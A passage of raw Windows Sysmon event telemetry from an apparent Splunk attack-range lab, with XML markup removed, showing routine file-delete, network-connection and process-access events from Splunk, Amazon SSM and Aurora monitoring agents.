AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12668B90B4959AB90C01C0AA2BA7E52E,SHA256=8E388CE2EB0E7323CB490CD1E26C9B1843C51041D778F477DD0C48C118AE6481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:58.145{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB53425465BB4973DA32447BD28B0C8F,SHA256=1CD719D97E949D4C74728648D291B136CD061C72E8D45C8D78925C46D68D53F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018948Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:59.905{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5E9992BDB2118D32ED44F0CF1653557,SHA256=B5B334BC3C0959BEA9D7CA358706DC13992CC65ECB8A8D6348140C85ABC7B11A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:59.933{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-051MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:59.279{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=392E8A07AA5724EE4D94B9A4D499DE6A,SHA256=509397EB8F818D08DD435F034817D44A100F3F810034CF3C73F0AB58B0EC0749,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018950Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:00.996{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=670A4488D419183DE24689118B4DD661,SHA256=739570B13FB10869649E8AE17563A763BAC4728D3D7199FA65A334A476EB5A42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:00.946{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-052MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:00.384{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72A3F7F368DF90FED0CE5CF785346D1D,SHA256=C280A05495674F8D4DA00552C362C6617C01C8FEB49329A9BE78D82F5D20FB89,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018949Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:00.562{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=EF8007D13D2D28BC68ADF41ABE48D042,SHA256=E93974A94DCEBEE2072BE14CED360D0096D4FBADE77556F51D98907FF5F19C65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:00.065{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=F05DCD2C9DAFC0DF0D0002953A2310A5,SHA256=BF63376760D87E4E45E6376710954D664D70BDB26EA5FEEF8A5A3EB238767695,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:01.446{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=309AAC27AA5BE686513DB9544AFFAD4E,SHA256=928D6DEF4DE16EEDC7E49B7BD7ACA88E94485E82C9C5275DEF038C465D91A340,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018951Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:59.919{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50201-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000048607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:02.562{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEC9BF18C9F12234F876CA7924ABA5BD,SHA256=635E617ADE71084E4641BD069B4AC2A0724F7101E5DEC15E568F54183D4289E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018983Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.851{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018982Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.844{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018981Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.843{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018980Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.833{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018979Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.826{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018978Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.825{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018977Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.824{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018976Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.812{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018975Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.811{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018974Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.807{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018973Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.802{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018972Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.792{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018971Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.786{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018970Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.780{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018969Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.767{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018968Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.765{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018967Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.747{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018966Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.744{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018965Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.721{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018964Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.706{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018963Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.681{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018962Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.670{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018961Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.652{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018960Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.598{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program 